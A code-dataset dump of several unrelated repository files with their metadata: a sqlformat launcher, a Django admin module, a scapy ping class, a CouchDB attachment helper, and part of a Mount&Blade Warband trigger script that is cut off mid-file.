995e7d7fa2a00ac9c6f5dbea6b5dcb634a78969e | 74684bedb970ed2513df94610d2bc112e4c2fc2f | /venv/bin/sqlformat | 79b5cf7dad5c5b99d29b2e2355a475fbc1cbcf6a | [] | no_license | yuwenjian/appdownload | 5d540d56799408769474f516f089a25a231ca85f | 2fd6fd1a5483fc3bd7908a25bc237d4df53dcdb6 | refs/heads/master | 2023-04-30T17:43:17.014096 | 2021-05-20T14:37:01 | 2021-05-20T14:37:01 | 369,238,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | #!/Users/yuwenjian/PycharmProjects/appdownload/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from sqlparse.__main__ import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"740225978@qq.com"
] | 740225978@qq.com | |
0c5dad277b1f94b096cb126e84f0d1017a3d54d2 | a9bc7252381890cb95a4d56215ae9094e355c793 | /products/admin.py | 2efd3c24f71c899d3225e4c10151d45604e12fec | [] | no_license | behnazkhoshnood/tadig_restaurant_v2 | 35e2f89206824dda61ddc58bf7ae6b81ea7b741f | 0abb0e1c6e96ea57d6924a4eacbed883745804c4 | refs/heads/master | 2023-06-26T00:31:49.495375 | 2021-08-02T10:36:16 | 2021-08-02T10:36:16 | 361,359,556 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 754 | py | from django.contrib import admin
from .models import Product, Category, Review
# Register your models here.
class ProductAdmin(admin.ModelAdmin):
list_display = (
'sku',
'name',
'category',
'price',
'image',
)
ordering = ('sku',)
class CategoryAdmin(admin.ModelAdmin):
list_display = (
'friendly_name',
'name',
)
class ReviewAdmin(admin.ModelAdmin):
list_display = (
'product',
'user',
'comment',
'rating',
)
readonly_fields = (
'product',
'user',
'comment',
'rating',
)
admin.site.register(Product, ProductAdmin)
admin.site.register(Category, CategoryAdmin)
admin.site.register(Review)
| [
"behnaz.khoshnood@gmail.com"
] | behnaz.khoshnood@gmail.com |
6d73d131e26cfb65c423acd5a641958d3283c4e9 | 8704a683e1fa8c7c15d114fca47345eef060326b | /类/Pingclass.py | 37f162cbbd1550ec1a90053f63e4624826cfe8ab | [] | no_license | jiaojiner/Python_Basic | 823be07e8c02585174d933bc3e4ecf528086162c | 788243f95746e2a00890ebb3262085598ab84800 | refs/heads/master | 2020-12-31T22:47:04.561208 | 2020-11-23T13:59:04 | 2020-11-23T13:59:04 | 239,061,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | #!/usr/bin/env python3
# -*- encoding = utf-8 -*-
# 该代码由本人学习时编写,仅供自娱自乐!
# 本人QQ:1945962391
# 欢迎留言讨论,共同学习进步!
from scapy.layers.inet import IP, ICMP
from scapy.sendrecv import sr1
class Pingclass:
def __init__(self, srcip, dstip, qua=1):
self.srcip = srcip
self.ip = dstip
self.qua = qua
self.pkt = IP(src=self.srcip, dst=self.ip)/ICMP()
# def src(self, srcip):
# self.srcip = srcip
# self.pkt = IP(src=self.srcip, dst=self.ip)/ICMP()
def ping(self):
for x in range(self.qua):
result = sr1(self.pkt, timeout=1, verbose=False)
if result:
print(self.ip, '可达!')
else:
print(self.ip, '不可达!')
| [
"15148365776@163.com"
] | 15148365776@163.com |
970b585846494138f5ad4e230612d400e3710200 | 727f1bc2205c88577b419cf0036c029b8c6f7766 | /out-bin/py/google/fhir/models/run_locally.runfiles/com_google_fhir/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/util/lazy_loader.py | 44594aaf70c93ad1b1494c16df3e8a52cb7efb6d | [
"Apache-2.0"
] | permissive | rasalt/fhir | 55cf78feed3596a3101b86f9e9bbf6652c6ed4ad | d49883cc4d4986e11ca66058d5a327691e6e048a | refs/heads/master | 2020-04-13T00:16:54.050913 | 2019-01-15T14:22:15 | 2019-01-15T14:22:15 | 160,260,223 | 0 | 0 | Apache-2.0 | 2018-12-03T22:07:01 | 2018-12-03T22:07:01 | null | UTF-8 | Python | false | false | 178 | py | /home/rkharwar/.cache/bazel/_bazel_rkharwar/c4bcd65252c8f8250f091ba96375f9a5/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/util/lazy_loader.py | [
"ruchika.kharwar@gmail.com"
] | ruchika.kharwar@gmail.com |
27828211be311596d2c18ff3abb1ad40fcdeeb1b | 41874a979a1e34fde24c868a622c985192e6b082 | /chairdb/dbs/attachments.py | b567e5e8790868504df891b1abc30ffeb5f9a1a4 | [
"Apache-2.0"
] | permissive | KouchDB/chairdb | 85f978ecee5ddf9fe1005982d0f41e66c71dc166 | 5cd64c7b58eef960a434da672e72c9b73e576283 | refs/heads/master | 2023-04-26T01:07:35.421151 | 2021-05-29T19:05:26 | 2021-05-29T19:05:26 | 562,342,461 | 1 | 0 | Apache-2.0 | 2022-11-06T03:05:41 | 2022-11-06T03:05:40 | null | UTF-8 | Python | false | false | 2,953 | py | import bisect
import typing
from ..errors import PreconditionFailed
from ..datatypes import AttachmentMetadata, AttachmentStub
class AttachmentRecord(typing.NamedTuple):
meta: AttachmentMetadata
data_ptr: typing.Any
def read_atts(att_store_raw, branch, selector):
att_store = decode_att_store(att_store_raw)
names, since_revs = selector
result = {}
todo = []
for name, att_record in att_store.items():
rec_rev_num = att_record.meta.rev_pos
changed = record_change_since(rec_rev_num, since_revs, branch)
if name in names or changed:
todo.append((name, att_record))
else:
result[name] = AttachmentStub(att_record.meta)
return result, todo
def decode_att_store(store):
return {
name: AttachmentRecord(AttachmentMetadata(*meta), ptr)
for name, (meta, ptr) in store.items()
}
def record_change_since(record_rev_num, revs, branch):
return not (revs is None or any(
record_rev_num <= rev_num and branch.contains(rev_num, rev_hash)
for rev_num, rev_hash in revs
))
def update_atts(store_raw, new_attachments, chunk_info):
store = decode_att_store(store_raw)
new_store = {}
for name, new_att in new_attachments.items():
if new_att.is_stub:
new_store[name] = reuse_record(store, name, new_att)
else:
new_store[name] = AttachmentRecord(new_att.meta, chunk_info[name])
return new_store
def reuse_record(store, name, new_att):
try:
old_att = store[name]
except KeyError:
raise PreconditionFailed('stub without attachment')
if new_att.meta.rev_pos != old_att.meta.rev_pos:
raise PreconditionFailed('stub with wrong rev_pos')
# re-use the existing one, but allow changing e.g. the
# content-type. CouchDB does too...
return AttachmentRecord(new_att.meta, old_att.data_ptr)
def chunk_id(att_id, i):
return f'_chunk_{att_id}_{i:020}'
def slice_att(data_ptr, slice):
assert slice.step is None
att_id, chunk_ends = data_ptr
start_chunk_i, start_offset = find_start(slice.start, chunk_ends)
end_chunk_i, end_offset = find_end(slice.stop, chunk_ends)
start_key = chunk_id(att_id, start_chunk_i)
end_key = chunk_id(att_id, end_chunk_i)
last_i = end_chunk_i - start_chunk_i
return start_key, end_key, start_offset, end_offset, last_i
def find_start(start, chunk_ends):
if start is None:
return 0, None
start_chunk_i = bisect.bisect_right(chunk_ends, start)
return start_chunk_i, start - chunk_start(chunk_ends, start_chunk_i)
def find_end(stop, chunk_ends):
if stop is None:
return len(chunk_ends) - 1, None
end_chunk_i = bisect.bisect_left(chunk_ends, stop)
return end_chunk_i, stop - chunk_start(chunk_ends, end_chunk_i)
def chunk_start(chunk_ends, chunk_i):
if chunk_i == 0:
return 0
return chunk_ends[chunk_i - 1]
| [
"m@rtendevri.es"
] | m@rtendevri.es |
8cd9a1e1e32f967d1d4ab387ae290f7e282e8669 | ab224876fc8da911f3a43554701c2d8392191039 | /source/module_triggers.py | 5fc446775e0cda62d8b8641ac459a53840a99e7e | [] | no_license | LilyModzStuff/warband_mod_source | ab5170f7ee3dd5a1af3541e50891029bcd5701be | c9737d7793ccdb185d8d3caedda0da915104e405 | refs/heads/master | 2022-10-04T21:01:08.032485 | 2019-04-05T06:59:44 | 2019-04-05T06:59:44 | 144,548,421 | 18 | 17 | null | 2022-09-08T08:31:38 | 2018-08-13T08:06:59 | Python | UTF-8 | Python | false | false | 86,926 | py | from header_common import *
from header_operations import *
from header_parties import *
from header_items import *
from header_skills import *
from header_triggers import *
from header_troops import *
from module_constants import *
from compiler import *
####################################################################################################################
# Each trigger contains the following fields:
# 1) Check interval: How frequently this trigger will be checked
# 2) Delay interval: Time to wait before applying the consequences of the trigger
# After its conditions have been evaluated as true.
# 3) Re-arm interval. How much time must pass after applying the consequences of the trigger for the trigger to become active again.
# You can put the constant ti_once here to make sure that the trigger never becomes active again after it fires once.
# 4) Conditions block (list). This must be a valid operation block. See header_operations.py for reference.
# Every time the trigger is checked, the conditions block will be executed.
# If the conditions block returns true, the consequences block will be executed.
# If the conditions block is empty, it is assumed that it always evaluates to true.
# 5) Consequences block (list). This must be a valid operation block. See header_operations.py for reference.
####################################################################################################################
# Some constants for use below
merchant_inventory_space = 30
num_merchandise_goods = 36
triggers = [
# Tutorial:
(0.1, 0, ti_once, [(map_free,0)], [(dialog_box,"str_tutorial_map1")]),
# Refresh Merchants
(0.0, 0, 168.0, [],
[
(call_script, "script_refresh_center_inventories"),
]),
# Refresh Armor sellers
(0.0, 0, 168.0, [],
[
(call_script, "script_refresh_center_armories"),
]),
# Refresh Weapon sellers
(0.0, 0, 168.0, [],
[
(call_script, "script_refresh_center_weaponsmiths"),
]),
# Refresh Horse sellers
(0.0, 0, 168.0, [],
[
(call_script, "script_refresh_center_stables"),
]),
#############
#Captivity:
# (1.0, 0, 0.0, [],
# [
# (ge,"$captivity_mode",1),
# (store_current_hours,reg(1)),
# (val_sub,reg(1),"$captivity_end_time"),
# (ge,reg(1),0),
# (display_message,"str_nobleman_reached_destination"),
# (jump_to_menu,"$captivity_end_menu"),
# ]),
(5.7, 0, 0.0,
[
(store_num_parties_of_template, reg2, "pt_manhunters"),
(lt, reg2, 4)
],
[
(set_spawn_radius, 1),
# (store_add, ":p_town_22_plus_one", "p_town_22", 1), #SB : obvious random range
(store_random_in_range, ":selected_town", towns_begin, towns_end),
(spawn_around_party, ":selected_town", "pt_manhunters"),
]),
(1.0, 0.0, 0.0, [
(check_quest_active, "qst_track_down_bandits"),
(neg|check_quest_failed, "qst_track_down_bandits"),
(neg|check_quest_succeeded, "qst_track_down_bandits"),
],
[
(quest_get_slot, ":bandit_party", "qst_track_down_bandits", slot_quest_target_party),
(try_begin),
(party_is_active, ":bandit_party"),
(store_faction_of_party, ":bandit_party_faction", ":bandit_party"),
(neg|is_between, ":bandit_party_faction", kingdoms_begin, kingdoms_end), #ie, the party has not respawned as a non-bandit
(assign, ":spot_range", 8),
(try_begin),
(is_currently_night),
(assign, ":spot_range", 5),
(try_end),
(try_for_parties, ":party"),
(gt, ":party", "p_spawn_points_end"),
(store_faction_of_party, ":faction", ":party"),
(is_between, ":faction", kingdoms_begin, kingdoms_end),
(store_distance_to_party_from_party, ":distance", ":party", ":bandit_party"),
(lt, ":distance", ":spot_range"),
(try_begin),
(eq, "$cheat_mode", 1),
(str_store_party_name, s4, ":party"),
(display_message, "@{!}DEBUG -- Wanted bandits spotted by {s4}"),
(try_end),
(call_script, "script_get_closest_center", ":bandit_party"),
(assign, ":nearest_center", reg0),
# (try_begin),
# (get_party_ai_current_behavior, ":behavior", ":party"),
# (eq, ":behavior", ai_bhvr_attack_party),
# (call_script, "script_add_log_entry", logent_party_chases_wanted_bandits, ":party", ":nearest_center", ":bandit_party", -1),
# (else_try),
# (eq, ":behavior", ai_bhvr_avoid_party),
# (call_script, "script_add_log_entry", logent_party_runs_from_wanted_bandits, ":party", ":nearest_center", ":bandit_party", -1),
# (else_try),
(call_script, "script_add_log_entry", logent_party_spots_wanted_bandits, ":party", ":nearest_center", ":bandit_party", -1),
# (try_end),
(try_end),
(else_try), #Party not found
(display_message, "str_bandits_eliminated_by_another"),
(call_script, "script_abort_quest", "qst_track_down_bandits", 0),
(try_end),
]),
#Tax Collectors
# Prisoner Trains
# (4.1, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_prisoner_train"),
# (assign, "$pin_limit", peak_prisoner_trains),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# (party_set_ai_behavior,"$pout_party",ai_bhvr_travel_to_party),
# (party_set_ai_object,"$pout_party","$pout_town"),
# ]),
#
# (4.1, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_prisoner_train"),
# (assign, "$pin_limit", peak_prisoner_trains),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# (party_set_ai_behavior,"$pout_party",ai_bhvr_travel_to_party),
# (party_set_ai_object,"$pout_party","$pout_town"),
# ]),
(2.0, 0, 0, [(store_random_party_of_template, reg(2), "pt_prisoner_train_party"),
(party_is_in_any_town,reg(2)),
],
[(store_faction_of_party, ":faction_no", reg(2)),
(call_script,"script_cf_select_random_walled_center_with_faction", ":faction_no", -1),
(party_set_ai_behavior,reg(2),ai_bhvr_travel_to_party),
(party_set_ai_object,reg(2),reg0),
(party_set_flags, reg(2), pf_default_behavior, 0),
]),
##Caravans
# (4.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_caravan"),
# (assign, "$pin_limit", peak_kingdom_caravans),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# (party_set_ai_behavior,"$pout_party",ai_bhvr_travel_to_party),
# (party_set_ai_object,"$pout_party","$pout_town"),
# ]),
# (4.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_caravan"),
# (assign, "$pin_limit", peak_kingdom_caravans),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# (party_set_ai_behavior,"$pout_party",ai_bhvr_travel_to_party),
# (party_set_ai_object,"$pout_party","$pout_town"),
# ]),
## (2.0, 0, 0, [(store_random_party_of_template, reg(2), "pt_kingdom_caravan_party"),
## (party_is_in_any_town,reg(2)),
## ],
## [(store_faction_of_party, ":faction_no", reg(2)),
## (call_script,"script_cf_select_random_town_with_faction", ":faction_no"),
## (party_set_ai_behavior,reg(2),ai_bhvr_travel_to_party),
## (party_set_ai_object,reg(2),reg0),
## (party_set_flags, reg(2), pf_default_behavior, 0),
## ]),
(4.0, 0, 0.0,
[
(eq, "$caravan_escort_state", 1), #cancel caravan_escort_state if caravan leaves the destination
(assign, ":continue", 0),
(try_begin),
(neg|party_is_active, "$caravan_escort_party_id"),
(assign, ":continue", 1),
(else_try),
(get_party_ai_object, ":ai_object", "$caravan_escort_party_id"),
(neq, ":ai_object", "$caravan_escort_destination_town"),
(assign, ":continue", 1),
(try_end),
(eq, ":continue", 1),
],
[
(assign, "$caravan_escort_state", 0),
]),
#Messengers
# (4.2, 0, 0.0, [],
# [(assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_messenger"),
# (assign, "$pin_limit", peak_kingdom_messengers),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# (party_set_ai_behavior,"$pout_party",ai_bhvr_travel_to_party),
# (party_set_ai_object,"$pout_party","$pout_town"),
# ]),
# (4.2, 0, 0.0, [],
# [(assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_messenger"),
# (assign, "$pin_limit", peak_kingdom_caravans),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# (party_set_ai_behavior,"$pout_party",ai_bhvr_travel_to_party),
# (party_set_ai_object,"$pout_party","$pout_town"),
# ]),
#SB : messengers are deleted upon reaching destination, this should never apply
(1.5, 0, 0, [
# (store_random_party_of_template, reg(2), "pt_messenger_party"),
# (party_is_in_any_town,reg(2)),
],
[
# (store_faction_of_party, ":faction_no", reg(2)),
# (call_script,"script_cf_select_random_walled_center_with_faction", ":faction_no", -1),
# (party_set_ai_behavior,reg(2),ai_bhvr_travel_to_party),
# (party_set_ai_object,reg(2),reg0),
# (party_set_flags, reg(2), pf_default_behavior, 0),
]),
#Deserters
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_deserters"),
# (assign, "$pin_limit", 4),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_deserters"),
# (assign, "$pin_limit", 4),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
#Kingdom Parties
(1.0, 0, 0.0, [],
[(try_for_range, ":cur_kingdom", kingdoms_begin, kingdoms_end),
(faction_slot_eq, ":cur_kingdom", slot_faction_state, sfs_active),
## (neq, ":cur_kingdom", "fac_player_supporters_faction"),
## (try_begin),
## (store_random_in_range, ":random_no", 0, 100),
## (lt, ":random_no", 10),
## (call_script, "script_create_kingdom_party_if_below_limit", ":cur_kingdom", spt_forager),
## (try_end),
## (try_begin),
## (store_random_in_range, ":random_no", 0, 100),
## (lt, ":random_no", 10),
## (call_script, "script_create_kingdom_party_if_below_limit", ":cur_kingdom", spt_scout),
## (try_end),
## (try_begin),
## (store_random_in_range, ":random_no", 0, 100),
## (lt, ":random_no", 10),
## (call_script, "script_create_kingdom_party_if_below_limit", ":cur_kingdom", spt_patrol),
## (try_end),
## (try_begin),
## (store_random_in_range, ":random_no", 0, 100),
## (lt, ":random_no", 10),
## (call_script, "script_create_kingdom_party_if_below_limit", ":cur_kingdom", spt_messenger),
## (try_end),
(try_begin),
(store_random_in_range, ":random_no", 0, 100),
(lt, ":random_no", 10),
(call_script, "script_create_kingdom_party_if_below_limit", ":cur_kingdom", spt_kingdom_caravan),
(try_end),
## (try_begin),
## (store_random_in_range, ":random_no", 0, 100),
## (lt, ":random_no", 10),
## (call_script, "script_create_kingdom_party_if_below_limit", ":cur_kingdom", spt_prisoner_train),
## (try_end),
(try_end),
]),
#Swadians
# (0.0, 0.0, ti_once, [], [(assign,"$peak_swadian_foragers",4)]),
# (0.0, 0.0, ti_once, [], [(assign,"$peak_swadian_scouts",4)]),
# (0.0, 0.0, ti_once, [], [(assign,"$peak_swadian_harassers",3)]),
# (0.0, 0.0, ti_once, [], [(assign,"$peak_swadian_war_parties",2)]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_foragers"),
# (assign, "$pin_limit", "$peak_swadian_foragers"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_scouts"),
# (assign, "$pin_limit", "$peak_swadian_scouts"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_patrol"),
# (assign, "$pin_limit", "$peak_swadian_harassers"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_swadians"),
# (assign, "$pin_party_template", "pt_swadian_war_party"),
# (assign, "$pin_limit", "$peak_swadian_war_parties"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
#Vaegirs
# (0.0, 0.0, ti_once, [], [(assign,"$peak_vaegir_foragers",4)]),
# (0.0, 0.0, ti_once, [], [(assign,"$peak_vaegir_scouts",4)]),
# (0.0, 0.0, ti_once, [], [(assign,"$peak_vaegir_harassers",3)]),
# (0.0, 0.0, ti_once, [], [(assign,"$peak_vaegir_war_parties",2)]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_foragers"),
# (assign, "$pin_limit", "$peak_vaegir_foragers"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_scouts"),
# (assign, "$pin_limit", "$peak_vaegir_scouts"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_patrol"),
# (assign, "$pin_limit", "$peak_vaegir_harassers"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
# (10.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_vaegirs"),
# (assign, "$pin_party_template", "pt_vaegir_war_party"),
# (assign, "$pin_limit", "$peak_vaegir_war_parties"),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
#Villains etc.
# (14.2, 0, 0.0, [],
# [
# (assign, "$pin_faction", "fac_sea_raiders"),
# (assign, "$pin_party_template", "pt_sea_raiders"),
# (assign, "$pin_limit", 5),
# (call_script,"script_cf_spawn_party_at_faction_town_if_below_limit"),
# ]),
#
## (10.1, 0, 0.0, [],
## [
## (assign, "$pin_party_template", "pt_refugees"),
## (assign, "$pin_limit", 5),
## (call_script,"script_cf_spawn_party_at_random_town_if_below_limit"),
## ]),
##
## (10.1, 0, 0.0, [],
## [
## (assign, "$pin_party_template", "pt_farmers"),
## (assign, "$pin_limit", 6),
## (call_script,"script_cf_spawn_party_at_random_town_if_below_limit"),
## ]),
# [1.0, 96.0, ti_once, [], [[assign,"$peak_dark_hunters",3]]],
## (10.1, 0, 0.0, [],
## [
## (assign, "$pin_party_template", "pt_dark_hunters"),
## (assign, "$pin_limit", "$peak_dark_hunters"),
## (call_script,"script_cf_spawn_party_at_random_town_if_below_limit"),
## ]),
#Companion quests
## (0, 0, ti_once,
## [
## (entering_town,"p_town_1"),
## (main_party_has_troop,"trp_borcha"),
## (eq,"$borcha_freed",0)
## ],
##
## [
## (assign,"$borcha_arrive_sargoth_as_prisoner", 1),
## (start_map_conversation, "trp_borcha", -1)
## ]
## ),
##
## (1, 0, ti_once,
## [
## (map_free,0),
## (eq,"$borcha_asked_for_freedom",0),
## (main_party_has_troop,"trp_borcha")
## ],
## [
## (start_map_conversation, "trp_borcha", -1)
## ]
## ),
##
## (2, 0, ti_once,
## [
## (map_free, 0),
## (neq,"$borcha_asked_for_freedom",0),
## (eq,"$borcha_freed",0),
## (main_party_has_troop,"trp_borcha")
## ],
## [
## (start_map_conversation, "trp_borcha", -1),
## ]
## ),
##### TODO: QUESTS COMMENT OUT BEGIN
###########################################################################
### Random Governer Quest triggers
###########################################################################
# Incriminate Loyal Advisor quest
(0.2, 0.0, 0.0,
[
(check_quest_active, "qst_incriminate_loyal_commander"),
(neg|check_quest_concluded, "qst_incriminate_loyal_commander"),
(quest_slot_eq, "qst_incriminate_loyal_commander", slot_quest_current_state, 2),
(quest_get_slot, ":quest_target_center", "qst_incriminate_loyal_commander", slot_quest_target_center),
(quest_get_slot, ":quest_target_party", "qst_incriminate_loyal_commander", slot_quest_target_party),
(try_begin),
(neg|party_is_active, ":quest_target_party"),
(quest_set_slot, "qst_incriminate_loyal_commander", slot_quest_current_state, 3),
(call_script, "script_fail_quest", "qst_incriminate_loyal_commander"),
(else_try),
(party_is_in_town, ":quest_target_party", ":quest_target_center"),
(remove_party, ":quest_target_party"),
(quest_set_slot, "qst_incriminate_loyal_commander", slot_quest_current_state, 3),
(quest_get_slot, ":quest_object_troop", "qst_incriminate_loyal_commander", slot_quest_object_troop),
(assign, ":num_available_factions", 0),
(try_for_range, ":faction_no", kingdoms_begin, kingdoms_end),
(faction_slot_eq, ":faction_no", slot_faction_state, sfs_active),
(neq, ":faction_no", "fac_player_supporters_faction"),
(neg|quest_slot_eq, "qst_incriminate_loyal_commander", slot_quest_target_faction, ":faction_no"),
(val_add, ":num_available_factions", 1),
(try_end),
(try_begin),
(gt, ":num_available_factions", 0),
(store_random_in_range, ":random_faction", 0, ":num_available_factions"),
(assign, ":target_faction", -1),
(try_for_range, ":faction_no", kingdoms_begin, kingdoms_end),
(eq, ":target_faction", -1),
(faction_slot_eq, ":faction_no", slot_faction_state, sfs_active),
(neq, ":faction_no", "fac_player_supporters_faction"),
(neg|quest_slot_eq, "qst_incriminate_loyal_commander", slot_quest_target_faction, ":faction_no"),
(val_sub, ":random_faction", 1),
(lt, ":random_faction", 0),
(assign, ":target_faction", ":faction_no"),
(try_end),
(try_end),
(try_begin),
(gt, ":target_faction", 0),
(call_script, "script_change_troop_faction", ":quest_object_troop", ":target_faction"),
(else_try),
(call_script, "script_change_troop_faction", ":quest_object_troop", "fac_robber_knights"),
(try_end),
(call_script, "script_succeed_quest", "qst_incriminate_loyal_commander"),
(try_end),
],
[]
),
# Runaway Peasants quest
(0.2, 0.0, 0.0,
[
(check_quest_active, "qst_bring_back_runaway_serfs"),
(neg|check_quest_concluded, "qst_bring_back_runaway_serfs"),
(quest_get_slot, ":quest_object_center", "qst_bring_back_runaway_serfs", slot_quest_object_center),
(quest_get_slot, ":quest_target_center", "qst_bring_back_runaway_serfs", slot_quest_target_center),
(try_begin),
(party_is_active, "$qst_bring_back_runaway_serfs_party_1"),
(try_begin),
(party_is_in_town, "$qst_bring_back_runaway_serfs_party_1", ":quest_target_center"),
(remove_party, "$qst_bring_back_runaway_serfs_party_1"),
(val_add, "$qst_bring_back_runaway_serfs_num_parties_fleed", 1),
(else_try),
(party_is_in_town, "$qst_bring_back_runaway_serfs_party_1", ":quest_object_center"),
(remove_party, "$qst_bring_back_runaway_serfs_party_1"),
(val_add, "$qst_bring_back_runaway_serfs_num_parties_returned", 1),
(else_try),
(store_distance_to_party_from_party, ":cur_distance", "p_main_party", "$qst_bring_back_runaway_serfs_party_1"),
(gt, ":cur_distance", 3),
(party_set_ai_object, "$qst_bring_back_runaway_serfs_party_1", ":quest_target_center"),
(try_end),
(try_end),
(try_begin),
(party_is_active, "$qst_bring_back_runaway_serfs_party_2"),
(try_begin),
(party_is_in_town, "$qst_bring_back_runaway_serfs_party_2", ":quest_target_center"),
(remove_party, "$qst_bring_back_runaway_serfs_party_2"),
(val_add, "$qst_bring_back_runaway_serfs_num_parties_fleed", 1),
(else_try),
(party_is_in_town, "$qst_bring_back_runaway_serfs_party_2", ":quest_object_center"),
(remove_party, "$qst_bring_back_runaway_serfs_party_2"),
(val_add, "$qst_bring_back_runaway_serfs_num_parties_returned", 1),
(else_try),
(store_distance_to_party_from_party, ":cur_distance", "p_main_party", "$qst_bring_back_runaway_serfs_party_2"),
(gt, ":cur_distance", 3),
(party_set_ai_object, "$qst_bring_back_runaway_serfs_party_2", ":quest_target_center"),
(try_end),
(try_end),
(try_begin),
(party_is_active, "$qst_bring_back_runaway_serfs_party_3"),
(try_begin),
(party_is_in_town, "$qst_bring_back_runaway_serfs_party_3", ":quest_target_center"),
(remove_party, "$qst_bring_back_runaway_serfs_party_3"),
(val_add, "$qst_bring_back_runaway_serfs_num_parties_fleed", 1),
(else_try),
(party_is_in_town, "$qst_bring_back_runaway_serfs_party_3", ":quest_object_center"),
(remove_party, "$qst_bring_back_runaway_serfs_party_3"),
(val_add, "$qst_bring_back_runaway_serfs_num_parties_returned", 1),
(else_try),
(store_distance_to_party_from_party, ":cur_distance", "p_main_party", "$qst_bring_back_runaway_serfs_party_3"),
(gt, ":cur_distance", 3),
(party_set_ai_object, "$qst_bring_back_runaway_serfs_party_3", ":quest_target_center"),
(try_end),
(try_end),
(assign, ":sum_removed", "$qst_bring_back_runaway_serfs_num_parties_returned"),
(val_add, ":sum_removed", "$qst_bring_back_runaway_serfs_num_parties_fleed"),
(ge, ":sum_removed", 3),
(try_begin),
(ge, "$qst_bring_back_runaway_serfs_num_parties_returned", 3),
(call_script, "script_succeed_quest", "qst_bring_back_runaway_serfs"),
(else_try),
(eq, "$qst_bring_back_runaway_serfs_num_parties_returned", 0),
(call_script, "script_fail_quest", "qst_bring_back_runaway_serfs"),
(else_try),
(call_script, "script_conclude_quest", "qst_bring_back_runaway_serfs"),
(try_end),
],
[]
),
### Defend Nobles Against Peasants quest
## (0.2, 0.0, 0.0,
## [
## (check_quest_active, "qst_defend_nobles_against_peasants"),
## (neg|check_quest_succeeded, "qst_defend_nobles_against_peasants"),
## (neg|check_quest_failed, "qst_defend_nobles_against_peasants"),
## (quest_get_slot, ":quest_target_center", "qst_defend_nobles_against_peasants", slot_quest_target_center),
## (assign, ":num_active_parties", 0),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_1", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_1"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_1", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_1"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_1"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_2", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_2"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_2", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_2"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_2"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_3", 0),
